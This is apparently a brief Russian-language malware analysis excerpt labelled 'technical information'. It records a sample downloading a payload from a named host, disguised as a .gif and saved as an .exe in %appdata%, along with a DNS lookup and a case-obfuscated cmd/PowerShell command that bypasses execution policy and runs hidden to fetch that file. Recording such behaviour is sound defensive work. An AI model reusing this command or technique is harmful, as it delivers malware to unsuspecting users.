Техническая информация
- http://www.freeflamec.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOweRShElL.exe -eXecutioNpolicY ByPaSs -noPRoFIle -WINdowStYle Hidden (nEw-OBJECT systeM.neT.WebCLIENt).DoWnLOAdfile('http://www.freeflamec.top/read.php?f=1.gif','%aPpdATA%.e...
- DNS ASK fr###lamec.top
- '<SYSTEM32>\cmd.exe' /C "pOweRShElL.exe -eXecutioNpolicY ByPaSs -noPRoFIle -WINdowStYle Hidden (nEw-OBJECT systeM.neT.WebCLIENt).DoWnLOAdfile('http://www.freeflamec.top/read.php?f=1.gif','%aPpdATA%.e...' (со скрытым окном)